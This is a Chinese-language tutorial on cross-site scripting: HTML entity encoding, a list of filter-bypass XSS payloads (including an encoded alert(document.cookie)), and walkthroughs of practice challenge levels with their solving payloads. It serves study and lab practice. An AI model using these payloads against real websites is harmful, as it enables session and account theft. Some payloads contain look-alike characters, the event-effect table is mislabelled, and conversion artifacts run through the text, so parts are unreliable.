HTML實體化編碼

為了避免 XSS 攻擊，會將<>編碼為<與>，這些就是 HTML 實體編碼。

編碼前	編碼后
不可分的空格	 
< (小于符號)	&lt;
> (大于符號)	&gt;
& (與符號)	&amp;
″ (雙引號)	&quot;
’ (單引號)	&apos;
? (版權(quán)符號)	&copy;

he.encode('<img src=""></img>') // "&#x3C;img src=&#x22;&#x22;&#x3E;&#x3C;/img&#x3E;"// 轉(zhuǎn)義
he.escape('<img src=""></img>') // "&lt;img src=&quot;&quot;&gt;&lt;/img&gt;"

常見的繞過payload

<img src="x" onerror=alert(1)>
<img src=1 οnmοuseοver=alert('xss')>
<a href="javascript:alert(1)">baidu</a>
<a href="javascript:aaa" onmouseover="alert(/xss/)">aa</a>
<script>alert('xss')</script>
<script>prompt('xss')</script>
<input value="" οnclick=alert('xss') type="text">
<input name="name" value="" οnmοuseοver=prompt('xss') bad="">
<iframe src="javascript:alert('xss')"><iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
<iframe src="aaa" οnmοuseοver=alert('xss') /><iframe>
<iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>
<svg onload=alert(1)>
<input name="name" value="" οnmοuseοver=prompt('xss') bad=“”>
<input type=“hidden” accesskey=“X” onclick=“alert(1)”>
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,
111,107,105,101,41)) 適用于繞過黑名單 alert 在跨站中，String.fromCharCode 主要是使到
一些已經(jīng)被列入黑名單的關(guān)鍵字或語句安全通過檢測，把關(guān)鍵字或語句轉(zhuǎn)換成為 ASCII 碼，
然后再用 String.fromCharCode 還原，因為大多數(shù)的過濾系統(tǒng)都不會把 String.fromCharCode
加以過濾，例如關(guān)鍵字 alert 被過濾掉，那就可以這么利用 alert(document.cookie)
<img src="1" onerror=alert(1)>
<img src="1" onerror=alert&#40;1&#41;>（實體化()
<img src=1 onerror=alert&#40&#41>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src="1" οnerrοr=location="javascript:alert(1)”>
<img src="1" οnerrοr=location="javascript:alert%281%29”>

靶場實戰(zhàn)（一）

歡迎來到XSS挑戰(zhàn)

Level 1

通過觀察頁面，猜測因該是一個傳參name=test可以下手

查看頁面源代碼

從這里我們可以看到它將name的參數(shù)值，插入到了<h2> </h2>標(biāo)簽之間，第一關(guān)沒有過濾
payload：name=<script>alert('xss')</script>

Level 2

一個搜索框，故技重施失敗了，判斷他有過濾

查看源代碼，上面一行是查詢的回顯，可以看到被實體化編碼了，下面一行被雙引號包裹

上面的實體化編碼無法繞過了，現(xiàn)在的目標(biāo)轉(zhuǎn)化為下面一行，那就是閉合！
payload: "><script>alert(1)</script>//
或者 "><script>alert(1)</script><

實測也可以不用注釋后面的">，說明HTML屬于弱類型，校驗不嚴格，另外查看這關(guān)源代碼，調(diào)用的函數(shù)是 htmlspecialchars() 它的作用就是讓 < 和 > 被HTML實體化編碼
PHP htmlspecialchars() 函數(shù)

Level 3

還是搜索框，故技重施x2，無果，看源代碼

這波看似沒辦法搞了，兩邊都被實體化了

仔細一想，兩個尖括號以及被ban掉，

特殊事件 onmouseover onclick onfocuse 的介紹鏈接：
HTML onmouseover 事件屬性 | 菜鳥教程
HTML onclick 事件屬性 | 菜鳥教程
HTML onfocus 事件屬性 | 菜鳥教程

函數(shù)	效果
οnmοuseοver=alert(1)	鼠標(biāo)指針移至圖片之上時彈窗
οnclick=alert(1)	輸入域獲得焦點時彈窗
οnfοcus=alert(1)	單擊鼠標(biāo)時彈窗

還有一個問題就是閉合這兩個引號，閉合前面的，注釋或者閉合后面的，這里跟上一關(guān)的標(biāo)簽閉合不一樣，是比較嚴格的，不閉合屬性中的值會無法執(zhí)行
payload：' onmouseover=alert(1) //
或者： ' onmouseover=alert(1) x='

靶場實戰(zhàn)（二）

alert(1)

0x00

啥也沒有直接來吧

0x01

前面的<textarea>標(biāo)簽有個特性，無法創(chuàng)建其他標(biāo)簽，那就閉合掉

0x02

input標(biāo)簽，直接onmouseover+閉合連招，
還有種方法是閉合+新開標(biāo)簽 "> <script>alert(1)</script>
當(dāng)然也可以用"><img src="x" onerror="alert(1)">也是很好用的

0x03

過濾了左右括號 （） 那就用反引號`繞過

?